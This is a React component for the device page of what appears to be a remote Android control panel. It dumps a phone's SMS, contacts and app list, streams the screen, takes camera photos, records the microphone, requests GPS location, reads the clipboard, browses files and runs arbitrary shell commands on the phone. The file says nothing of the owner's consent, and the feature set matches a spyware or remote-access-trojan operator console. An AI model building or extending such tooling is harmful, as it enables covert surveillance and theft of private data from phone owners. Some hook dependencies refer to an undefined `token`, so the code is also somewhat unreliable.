import React, { useState, useEffect, useCallback, useRef } from 'react';
import { Link, useParams } from 'react-router-dom';
import { useDevices } from '../store/devices';
import { api } from '../store/auth';
import { useLiveEvents } from '../hooks/useLiveEvents';
import toast from 'react-hot-toast';

// ── shared tiny helpers ────────────────────────────────────────────────────────
const S = {
  card: {
    background: 'var(--surface)', border: '1px solid var(--border)',
    borderRadius: 8, padding: 16, marginBottom: 16,
  },
  btn: (accent) => ({
    padding: '7px 14px', borderRadius: 6, border: 'none', cursor: 'pointer',
    fontWeight: 600, fontSize: 13,
    background: accent || 'var(--accent)', color: '#fff',
  }),
  btnMuted: {
    padding: '7px 14px', borderRadius: 6, border: '1px solid var(--border)',
    background: 'transparent', color: 'var(--text)', cursor: 'pointer', fontSize: 13,
  },
  input: {
    padding: '8px 12px', borderRadius: 6, border: '1px solid var(--border)',
    background: 'var(--bg)', color: 'var(--text)', fontSize: 13, outline: 'none',
  },
  label: { fontSize: 11, color: 'var(--muted)', marginBottom: 4, display: 'block' },
  row: { display: 'flex', alignItems: 'center', gap: 8, marginBottom: 8 },
};

function Field({ k, v }) {
  if (!v) return null;
  return (
    <div style={{ display: 'flex', gap: 8, marginBottom: 6, fontSize: 13 }}>
      <span style={{ color: 'var(--muted)', minWidth: 120, flexShrink: 0 }}>{k}</span>
      <span style={{ color: 'var(--text)', wordBreak: 'break-all' }}>{v}</span>
    </div>
  );
}

function SearchBar({ value, onChange, onSearch, placeholder }) {
  return (
    <form onSubmit={e => { e.preventDefault(); onSearch(); }} style={{ display: 'flex', gap: 8, marginBottom: 12 }}>
      <input
        style={{ ...S.input, flex: 1 }}
        value={value}
        onChange={e => onChange(e.target.value)}
        placeholder={placeholder || 'Search…'}
      />
      <button type="submit" style={S.btn()}>Search</button>
    </form>
  );
}

// ── Tab: Overview ──────────────────────────────────────────────────────────────
function OverviewTab({ device }) {
  return (
    <div style={S.card}>
      <h3 style={{ fontSize: 14, fontWeight: 700, marginBottom: 14, color: 'var(--accent)' }}>Device Information</h3>
      <Field k="Hostname" v={device.hostname} />
      <Field k="Label" v={device.label} />
      <Field k="OS / Version" v={device.os_version} />
      <Field k="IP Address" v={device.ip_address} />
      <Field k="Username" v={device.username} />
      <Field k="RAM" v={device.ram_gb && `${device.ram_gb} GB`} />
      <Field k="Platform" v={device.platform} />
      <Field k="Location" v={[device.city, device.state, device.country].filter(Boolean).join(', ') || null} />
      <Field k="Device Time" v={device.device_time ? `${device.device_time} (${device.timezone || ''})` : device.timezone} />
      <Field k="Last Seen" v={device.last_seen ? new Date(device.last_seen + 'Z').toLocaleString() : null} />
      <Field k="Online" v={device.is_online ? 'Yes' : 'No'} />
      <Field k="Device ID" v={device.device_id} />
    </div>
  );
}

// ── Tab: Screen ────────────────────────────────────────────────────────────────
function ScreenTab({ screenshot, streaming, onScreenshot, onStreamStart, onStreamStop }) {
  return (
    <div>
      <div style={{ display: 'flex', gap: 8, marginBottom: 16 }}>
        <button style={S.btn()} onClick={onScreenshot}>Screenshot</button>
        {!streaming
          ? <button style={S.btn('#16a34a')} onClick={onStreamStart}>Start Stream</button>
          : <button style={S.btn('#dc2626')} onClick={onStreamStop}>Stop Stream</button>
        }
        {streaming && (
          <span style={{ fontSize: 12, color: '#f59e0b', alignSelf: 'center' }}>
            ● Streaming — frames update below
          </span>
        )}
      </div>
      {screenshot ? (
        <div style={S.card}>
          <div style={{ display: 'flex', justifyContent: 'space-between', marginBottom: 8 }}>
            <span style={{ fontSize: 12, color: 'var(--muted)' }}>Latest frame</span>
            <a
              href={screenshot}
              download={`screen_${Date.now()}.jpg`}
              style={{ fontSize: 12, color: 'var(--accent)', textDecoration: 'none' }}
            >
              Download
            </a>
          </div>
          <img
            src={screenshot}
            alt="screen"
            style={{ maxWidth: '100%', borderRadius: 6, border: '1px solid var(--border)' }}
          />
        </div>
      ) : (
        <div style={{ ...S.card, textAlign: 'center', color: 'var(--muted)', padding: 48 }}>
          No screenshot yet — click Screenshot or Start Stream
        </div>
      )}
    </div>
  );
}

// ── Tab: SMS ───────────────────────────────────────────────────────────────────
function SmsTab({ sms, loading, q, setQ, onFetch, onDump, onDelete }) {
  return (
    <div>
      <div style={{ display: 'flex', gap: 8, marginBottom: 12 }}>
        <button style={S.btn()} onClick={onDump}>Dump from Device</button>
        <button style={S.btnMuted} onClick={onFetch}>Refresh</button>
        {onDelete && (
          <button style={S.btn('#dc2626')} onClick={() => { if (window.confirm('Wipe stored SMS?')) onDelete(); }}>
            Wipe Stored SMS
          </button>
        )}
      </div>
      <SearchBar value={q} onChange={setQ} onSearch={onFetch} placeholder="Search messages or address…" />
      {loading && <p style={{ color: 'var(--muted)', fontSize: 13 }}>Loading…</p>}
      {!loading && sms.length === 0 && (
        <p style={{ color: 'var(--muted)', fontSize: 13 }}>
          No messages stored — tap "Dump from Device" to pull SMS from the phone.
        </p>
      )}
      <div style={{ display: 'flex', flexDirection: 'column', gap: 8 }}>
        {sms.map(m => (
          <div key={m.id} style={{
            ...S.card, padding: '10px 14px', marginBottom: 0,
            borderLeft: `3px solid ${m.type === 1 ? 'var(--accent)' : '#f59e0b'}`,
          }}>
            <div style={{ display: 'flex', justifyContent: 'space-between', marginBottom: 4 }}>
              <span style={{ fontWeight: 600, fontSize: 13 }}>{m.address || '(unknown)'}</span>
              <span style={{ fontSize: 11, color: 'var(--muted)' }}>
                {m.type === 1 ? 'Inbox' : 'Sent'} · {m.date_ms ? new Date(m.date_ms).toLocaleString() : ''}
              </span>
            </div>
            <p style={{ margin: 0, fontSize: 13, color: 'var(--text)', lineHeight: 1.5 }}>{m.body}</p>
          </div>
        ))}
      </div>
    </div>
  );
}

// ── Tab: Contacts ──────────────────────────────────────────────────────────────
function ContactsTab({ contacts, loading, q, setQ, onFetch, onDump }) {
  return (
    <div>
      <div style={{ display: 'flex', gap: 8, marginBottom: 12 }}>
        <button style={S.btn()} onClick={onDump}>Dump from Device</button>
        <button style={S.btnMuted} onClick={onFetch}>Refresh</button>
      </div>
      <SearchBar value={q} onChange={setQ} onSearch={onFetch} placeholder="Search name or number…" />
      {loading && <p style={{ color: 'var(--muted)', fontSize: 13 }}>Loading…</p>}
      {!loading && contacts.length === 0 && (
        <p style={{ color: 'var(--muted)', fontSize: 13 }}>
          No contacts stored — tap "Dump from Device" first.
        </p>
      )}
      <div style={{
        display: 'grid', gridTemplateColumns: 'repeat(auto-fill, minmax(220px,1fr))', gap: 8,
      }}>
        {contacts.map(c => (
          <div key={c.id} style={{ ...S.card, marginBottom: 0, padding: '10px 14px' }}>
            <div style={{ fontWeight: 600, fontSize: 13, marginBottom: 3 }}>{c.name || '(no name)'}</div>
            <div style={{ fontSize: 12, color: 'var(--muted)' }}>{c.number}</div>
          </div>
        ))}
      </div>
    </div>
  );
}

// ── Tab: Apps ──────────────────────────────────────────────────────────────────
function AppsTab({ apps, loading, q, setQ, showSystem, setShowSystem, onFetch, onDump, onLaunch, onKill, onUninstall }) {
  return (
    <div>
      <div style={{ display: 'flex', gap: 8, marginBottom: 12, flexWrap: 'wrap', alignItems: 'center' }}>
        <button style={S.btn()} onClick={onDump}>Dump from Device</button>
        <button style={S.btnMuted} onClick={onFetch}>Refresh</button>
        <label style={{ display: 'flex', alignItems: 'center', gap: 6, fontSize: 13, cursor: 'pointer', marginLeft: 4 }}>
          <input type="checkbox" checked={showSystem} onChange={e => { setShowSystem(e.target.checked); onFetch(); }} />
          Show system apps
        </label>
        {apps.length > 0 && <span style={{ fontSize: 12, color: 'var(--muted)', marginLeft: 'auto' }}>{apps.length} apps</span>}
      </div>
      <SearchBar value={q} onChange={setQ} onSearch={onFetch} placeholder="Search app name or package…" />
      {loading && <p style={{ color: 'var(--muted)', fontSize: 13 }}>Loading…</p>}
      {!loading && apps.length === 0 && (
        <p style={{ color: 'var(--muted)', fontSize: 13 }}>
          No apps stored — tap "Dump from Device" first.
        </p>
      )}
      <div style={{ display: 'flex', flexDirection: 'column', gap: 6 }}>
        {apps.map(a => (
          <div key={a.id} style={{
            ...S.card, marginBottom: 0, padding: '8px 14px',
            display: 'flex', alignItems: 'center', gap: 12,
          }}>
            <div style={{ flex: 1, minWidth: 0 }}>
              <div style={{ fontWeight: 600, fontSize: 13 }}>{a.label || a.package_name}</div>
              <div style={{ fontSize: 11, color: 'var(--muted)', fontFamily: 'monospace' }}>{a.package_name}</div>
              <div style={{ fontSize: 11, color: 'var(--muted)' }}>v{a.version}</div>
            </div>
            {a.is_system && (
              <span style={{ fontSize: 10, padding: '1px 6px', borderRadius: 3, background: '#7c3aed22', border: '1px solid #7c3aed55', color: '#a78bfa' }}>SYS</span>
            )}
            <div style={{ display: 'flex', gap: 6, flexShrink: 0 }}>
              <button style={{ ...S.btn('#16a34a'), padding: '4px 10px', fontSize: 11 }} onClick={() => onLaunch(a.package_name)}>Launch</button>
              <button style={{ ...S.btn('#f59e0b'), padding: '4px 10px', fontSize: 11 }} onClick={() => onKill(a.package_name)}>Kill</button>
              <button style={{ ...S.btn('#dc2626'), padding: '4px 10px', fontSize: 11 }} onClick={() => onUninstall(a.package_name)}>Remove</button>
            </div>
          </div>
        ))}
      </div>
    </div>
  );
}

// ── Tab: Controls ──────────────────────────────────────────────────────────────
function ControlsTab({
  shellCmd, setShellCmd, shellOutput, onShell,
  micDuration, setMicDuration, micRecording, onMicStart,
  location, onLocation,
  onCameraFront, onCameraBack,
  filePath, setFilePath, fileEntries, onFileList,
  appPackage, setAppPackage, onAppLaunch, onAppKill,
  onClipboard, onRestart, onDeviceInfo,
}) {
  const termRef = useRef(null);
  useEffect(() => {
    if (termRef.current) termRef.current.scrollTop = termRef.current.scrollHeight;
  }, [shellOutput]);

  return (
    <div>
      {/* Shell */}
      <div style={S.card}>
        <h3 style={{ fontSize: 14, fontWeight: 700, marginBottom: 12, color: 'var(--accent)' }}>Shell (sh)</h3>
        <form onSubmit={e => { e.preventDefault(); if (shellCmd.trim()) onShell(); }} style={{ display: 'flex', gap: 8, marginBottom: 10 }}>
          <input
            style={{ ...S.input, flex: 1, fontFamily: 'monospace', fontSize: 12 }}
            value={shellCmd}
            onChange={e => setShellCmd(e.target.value)}
            placeholder="e.g.  ls /sdcard  or  id"
          />
          <button type="submit" style={S.btn()}>Run</button>
        </form>
        {shellOutput.length > 0 && (
          <div ref={termRef} style={{
            background: '#0a0a0a', color: '#e5e7eb', fontFamily: 'monospace', fontSize: 12,
            padding: 12, borderRadius: 6, maxHeight: 300, overflowY: 'auto', whiteSpace: 'pre-wrap',
          }}>
            {shellOutput.map((e, i) => (
              <div key={i}>
                {e._cmd && <div style={{ color: '#6ee7b7' }}>$ {e._cmd}</div>}
                {e.stdout && <div>{e.stdout}</div>}
                {e.stderr && <div style={{ color: '#f87171' }}>{e.stderr}</div>}
              </div>
            ))}
          </div>
        )}
      </div>

      {/* Camera */}
      <div style={S.card}>
        <h3 style={{ fontSize: 14, fontWeight: 700, marginBottom: 12, color: 'var(--accent)' }}>Camera</h3>
        <div style={S.row}>
          <button style={S.btn()} onClick={onCameraFront}>Front Camera</button>
          <button style={S.btn('#7c3aed')} onClick={onCameraBack}>Back Camera</button>
          <span style={{ fontSize: 12, color: 'var(--muted)' }}>Photo saved to downloads</span>
        </div>
      </div>

      {/* Mic */}
      <div style={S.card}>
        <h3 style={{ fontSize: 14, fontWeight: 700, marginBottom: 12, color: 'var(--accent)' }}>Microphone</h3>
        <div style={S.row}>
          <label style={S.label}>Duration (sec)</label>
          <input
            type="number" min={1} max={300}
            style={{ ...S.input, width: 80 }}
            value={micDuration}
            onChange={e => setMicDuration(Number(e.target.value))}
          />
          <button style={S.btn(micRecording ? '#dc2626' : '#16a34a')} disabled={micRecording} onClick={onMicStart}>
            {micRecording ? 'Recording…' : 'Record'}
          </button>
        </div>
      </div>

      {/* Location */}
      <div style={S.card}>
        <h3 style={{ fontSize: 14, fontWeight: 700, marginBottom: 12, color: 'var(--accent)' }}>Location</h3>
        <button style={S.btn()} onClick={onLocation}>Request Location</button>
        {location && (
          <div style={{ marginTop: 12 }}>
            <Field k="Latitude" v={String(location.lat)} />
            <Field k="Longitude" v={String(location.lng)} />
            <Field k="Accuracy" v={location.accuracy && `${location.accuracy}m`} />
            <Field k="Provider" v={location.provider} />
            {location.lat && (
              <a
                href={`https://maps.google.com/?q=${location.lat},${location.lng}`}
                target="_blank"
                rel="noreferrer"
                style={{ fontSize: 13, color: 'var(--accent)' }}
              >
                Open in Maps
              </a>
            )}
          </div>
        )}
      </div>

      {/* File Browser */}
      <div style={S.card}>
        <h3 style={{ fontSize: 14, fontWeight: 700, marginBottom: 12, color: 'var(--accent)' }}>File Browser</h3>
        <form onSubmit={e => { e.preventDefault(); onFileList(); }} style={{ display: 'flex', gap: 8, marginBottom: 10 }}>
          <input
            style={{ ...S.input, flex: 1, fontFamily: 'monospace', fontSize: 12 }}
            value={filePath}
            onChange={e => setFilePath(e.target.value)}
            placeholder="/sdcard/Download"
          />
          <button type="submit" style={S.btn()}>List</button>
        </form>
        {fileEntries.length > 0 && (
          <div style={{
            background: 'var(--bg)', borderRadius: 6, border: '1px solid var(--border)',
            maxHeight: 280, overflowY: 'auto',
          }}>
            {fileEntries.map((f, i) => (
              <div key={i} style={{
                padding: '6px 12px', fontSize: 12, fontFamily: 'monospace',
                borderBottom: '1px solid var(--border)', display: 'flex', gap: 12,
                color: f.is_dir ? 'var(--accent)' : 'var(--text)',
              }}>
                <span>{f.is_dir ? '📁' : '📄'}</span>
                <span style={{ flex: 1 }}>{f.name}</span>
                <span style={{ color: 'var(--muted)' }}>{f.size != null && !f.is_dir ? `${(f.size / 1024).toFixed(1)} KB` : ''}</span>
              </div>
            ))}
          </div>
        )}
      </div>

      {/* App Control */}
      <div style={S.card}>
        <h3 style={{ fontSize: 14, fontWeight: 700, marginBottom: 12, color: 'var(--accent)' }}>App Control (by package)</h3>
        <input
          style={{ ...S.input, width: '100%', marginBottom: 10, fontFamily: 'monospace', fontSize: 12 }}
          value={appPackage}
          onChange={e => setAppPackage(e.target.value)}
          placeholder="com.example.app"
        />
        <div style={{ display: 'flex', gap: 8, flexWrap: 'wrap' }}>
          <button style={S.btn('#16a34a')} onClick={onAppLaunch}>Launch</button>
          <button style={S.btn('#f59e0b')} onClick={onAppKill}>Force Kill</button>
        </div>
      </div>

      {/* Misc */}
      <div style={S.card}>
        <h3 style={{ fontSize: 14, fontWeight: 700, marginBottom: 12, color: 'var(--accent)' }}>Other</h3>
        <div style={{ display: 'flex', gap: 8, flexWrap: 'wrap' }}>
          <button style={S.btnMuted} onClick={onClipboard}>Get Clipboard</button>
          <button style={S.btnMuted} onClick={onDeviceInfo}>Refresh Device Info</button>
          <button style={S.btn('#dc2626')} onClick={onRestart}>Restart Agent</button>
        </div>
      </div>
    </div>
  );
}

// ── Main Component ─────────────────────────────────────────────────────────────
const TABS = ['Overview', 'Screen', 'SMS', 'Contacts', 'Apps', 'Controls'];

export default function AndroidDeviceDetail() {
  const { deviceId } = useParams();
  const { devices } = useDevices();
  const device = devices.find(d => d.device_id === deviceId);
  const [tab, setTab] = useState('Overview');

  // Screen
  const [screenshot, setScreenshot] = useState(null);
  const [streaming, setStreaming] = useState(false);

  // SMS
  const [sms, setSms] = useState([]);
  const [smsQ, setSmsQ] = useState('');
  const [smsLoading, setSmsLoading] = useState(false);

  // Contacts
  const [contacts, setContacts] = useState([]);
  const [contactsQ, setContactsQ] = useState('');
  const [contactsLoading, setContactsLoading] = useState(false);

  // Apps
  const [apps, setApps] = useState([]);
  const [appsQ, setAppsQ] = useState('');
  const [appsLoading, setAppsLoading] = useState(false);
  const [showSystem, setShowSystem] = useState(false);

  // Shell
  const [shellCmd, setShellCmd] = useState('');
  const [shellOutput, setShellOutput] = useState([]);

  // Mic
  const [micDuration, setMicDuration] = useState(15);
  const [micRecording, setMicRecording] = useState(false);

  // Location
  const [location, setLocation] = useState(null);

  // Files
  const [filePath, setFilePath] = useState('/sdcard');
  const [fileEntries, setFileEntries] = useState([]);

  // App control
  const [appPackage, setAppPackage] = useState('');

  // ── Live events ──────────────────────────────────────────────────────────────
  useLiveEvents(useCallback((e) => {
    if (e.device_id !== deviceId) return;

    if (e.event === 'screenshot') {
      if (e.image) setScreenshot(`data:image/jpeg;base64,${e.image}`);
      if (!e.stream) toast.success('Screenshot captured');
    }

    if (e.event === 'shell_result') {
      setShellOutput(prev => [...prev, e].slice(-50));
    }

    if (e.event === 'mic_result') {
      setMicRecording(false);
      if (e.audio) {
        try {
          const bytes = atob(e.audio);
          const arr = new Uint8Array(bytes.length);
          for (let i = 0; i < bytes.length; i++) arr[i] = bytes.charCodeAt(i);
          const blob = new Blob([arr], { type: 'audio/wav' });
          const url = URL.createObjectURL(blob);
          const a = document.createElement('a');
          a.href = url; a.download = `mic_${deviceId}_${Date.now()}.wav`; a.click();
          URL.revokeObjectURL(url);
          toast.success('Mic recording downloaded');
        } catch {
          toast.error('Could not decode audio');
        }
      } else {
        toast(e.error || 'Mic result received (no audio)');
      }
    }

    if (e.event === 'location') {
      setLocation(e);
      toast.success('Location received');
    }

    if (e.event === 'camera_capture') {
      if (e.image) {
        const a = document.createElement('a');
        a.href = `data:image/jpeg;base64,${e.image}`;
        a.download = `camera_${e.camera || 'back'}_${deviceId}_${Date.now()}.jpg`;
        a.click();
        toast.success('Camera photo saved');
      } else {
        toast.error(e.error || 'Camera capture failed');
      }
    }

    if (e.event === 'file_list') {
      setFileEntries(e.entries || []);
    }

    if (e.event === 'sms_dump') {
      fetchSms(false);
    }

    if (e.event === 'contacts_dump') {
      fetchContacts(false);
    }

    if (e.event === 'app_list') {
      fetchApps(false);
    }

    if (e.event === 'app_control_result') {
      toast.success(`App: ${e.status || 'done'}${e.package ? ` (${e.package})` : ''}`);
    }

    if (e.event === 'clipboard') {
      toast(`Clipboard: ${e.text || '(empty)'}`, { duration: 6000 });
    }
  }, [deviceId])); // eslint-disable-line

  // ── Helpers ──────────────────────────────────────────────────────────────────
  const sendCmd = useCallback(async (type, data = {}) => {
    try {
      await api.post(`/android/command/${deviceId}`, { type, data });
    } catch (err) {
      toast.error(err.response?.data?.detail || 'Device offline');
    }
  }, [deviceId, token]);

  const fetchSms = useCallback(async (showToast = true) => {
    setSmsLoading(true);
    try {
      const q = smsQ ? `&q=${encodeURIComponent(smsQ)}` : '';
      const r = await api.get(`/android/sms/${deviceId}?limit=200${q}`);
      setSms(r.data.messages || []);
    } catch {
      if (showToast) toast.error('Failed to load SMS');
    } finally {
      setSmsLoading(false);
    }
  }, [deviceId, token, smsQ]);

  const fetchContacts = useCallback(async (showToast = true) => {
    setContactsLoading(true);
    try {
      const q = contactsQ ? `&q=${encodeURIComponent(contactsQ)}` : '';
      const r = await api.get(`/android/contacts/${deviceId}?limit=500${q}`);
      setContacts(r.data.contacts || []);
    } catch {
      if (showToast) toast.error('Failed to load contacts');
    } finally {
      setContactsLoading(false);
    }
  }, [deviceId, token, contactsQ]);

  const fetchApps = useCallback(async (showToast = true) => {
    setAppsLoading(true);
    try {
      const q = appsQ ? `&q=${encodeURIComponent(appsQ)}` : '';
      const sys = showSystem ? '&system=true' : '';
      const r = await api.get(`/android/apps/${deviceId}?limit=500${q}${sys}`);
      setApps(r.data.apps || []);
    } catch {
      if (showToast) toast.error('Failed to load apps');
    } finally {
      setAppsLoading(false);
    }
  }, [deviceId, token, appsQ, showSystem]);

  // Auto-fetch when switching tabs
  useEffect(() => {
    if (tab === 'SMS' && sms.length === 0) fetchSms();
    if (tab === 'Contacts' && contacts.length === 0) fetchContacts();
    if (tab === 'Apps' && apps.length === 0) fetchApps();
  }, [tab]); // eslint-disable-line

  if (!device) {
    return <p style={{ color: 'var(--muted)' }}>Device not found or not loaded yet.</p>;
  }

  return (
    <div>
      {/* Header */}
      <div style={{ display: 'flex', alignItems: 'center', gap: 12, marginBottom: 20, flexWrap: 'wrap' }}>
        <Link to="/" style={{ color: 'var(--muted)', textDecoration: 'none', fontSize: 13 }}>← Devices</Link>
        <span style={{
          padding: '2px 8px', background: '#3ddc8422', border: '1px solid #3ddc8466',
          borderRadius: 4, fontSize: 11, color: '#3ddc84', fontWeight: 700,
        }}>ANDROID</span>
        <h2 style={{ fontSize: 18, fontWeight: 700, margin: 0 }}>
          {device.label || device.hostname}
          <span style={{ fontWeight: 400, color: 'var(--muted)', fontSize: 13, marginLeft: 8 }}>
            (ID:{device.device_id.slice(0, 8)})
          </span>
        </h2>
        <span style={{
          width: 10, height: 10, borderRadius: '50%', flexShrink: 0,
          background: device.is_online ? 'var(--green)' : 'var(--muted)',
          display: 'inline-block',
        }} />
        <span style={{ fontSize: 12, color: device.is_online ? 'var(--green)' : 'var(--muted)' }}>
          {device.is_online ? 'Online' : 'Offline'}
        </span>
      </div>

      {/* Tab bar */}
      <div style={{
        display: 'flex', gap: 2, marginBottom: 20,
        borderBottom: '1px solid var(--border)',
      }}>
        {TABS.map(t => (
          <button key={t} onClick={() => setTab(t)} style={{
            padding: '8px 18px',
            background: 'transparent',
            border: 'none',
            borderBottom: tab === t ? '2px solid var(--accent)' : '2px solid transparent',
            color: tab === t ? 'var(--accent)' : 'var(--muted)',
            cursor: 'pointer', fontSize: 13, fontWeight: tab === t ? 700 : 400,
            transition: 'all .15s',
          }}>{t}</button>
        ))}
      </div>

      {/* Tab content */}
      {tab === 'Overview' && <OverviewTab device={device} />}

      {tab === 'Screen' && (
        <ScreenTab
          screenshot={screenshot}
          streaming={streaming}
          onScreenshot={() => sendCmd('screenshot_request')}
          onStreamStart={() => { setStreaming(true); sendCmd('screen_stream_start', { fps: 10, quality: 60 }); }}
          onStreamStop={() => { setStreaming(false); sendCmd('screen_stream_stop'); }}
        />
      )}

      {tab === 'SMS' && (
        <SmsTab
          sms={sms} loading={smsLoading} q={smsQ} setQ={setSmsQ}
          onFetch={fetchSms}
          onDump={() => { sendCmd('sms_dump'); toast('SMS dump requested…'); }}
          onDelete={async () => {
            await api.delete(`/android/sms/${deviceId}`);
            setSms([]);
            toast.success('Stored SMS wiped');
          }}
        />
      )}

      {tab === 'Contacts' && (
        <ContactsTab
          contacts={contacts} loading={contactsLoading} q={contactsQ} setQ={setContactsQ}
          onFetch={fetchContacts}
          onDump={() => { sendCmd('contacts_dump'); toast('Contacts dump requested…'); }}
        />
      )}

      {tab === 'Apps' && (
        <AppsTab
          apps={apps} loading={appsLoading} q={appsQ} setQ={setAppsQ}
          showSystem={showSystem} setShowSystem={setShowSystem}
          onFetch={fetchApps}
          onDump={() => { sendCmd('app_list'); toast('App list requested…'); }}
          onLaunch={pkg => sendCmd('app_launch', { package: pkg })}
          onKill={pkg => sendCmd('app_kill', { package: pkg })}
          onUninstall={pkg => { if (window.confirm(`Uninstall ${pkg}?`)) sendCmd('app_uninstall', { package: pkg }); }}
        />
      )}

      {tab === 'Controls' && (
        <ControlsTab
          shellCmd={shellCmd} setShellCmd={setShellCmd}
          shellOutput={shellOutput}
          onShell={() => { sendCmd('shell_exec', { cmd: shellCmd }); setShellOutput(prev => [...prev, { _cmd: shellCmd }].slice(-50)); setShellCmd(''); }}
          micDuration={micDuration} setMicDuration={setMicDuration}
          micRecording={micRecording}
          onMicStart={() => { setMicRecording(true); sendCmd('mic_record_start', { duration: micDuration }); }}
          location={location}
          onLocation={() => sendCmd('location_request')}
          onCameraFront={() => sendCmd('camera_capture', { camera: 'front' })}
          onCameraBack={() => sendCmd('camera_capture', { camera: 'back' })}
          filePath={filePath} setFilePath={setFilePath}
          fileEntries={fileEntries}
          onFileList={() => sendCmd('file_list', { path: filePath })}
          appPackage={appPackage} setAppPackage={setAppPackage}
          onAppLaunch={() => appPackage && sendCmd('app_launch', { package: appPackage })}
          onAppKill={() => appPackage && sendCmd('app_kill', { package: appPackage })}
          onClipboard={() => sendCmd('clipboard_get')}
          onRestart={() => { if (window.confirm('Restart the Android agent?')) sendCmd('restart_agent'); }}
          onDeviceInfo={() => sendCmd('device_info')}
        />
      )}
    </div>
  );
}
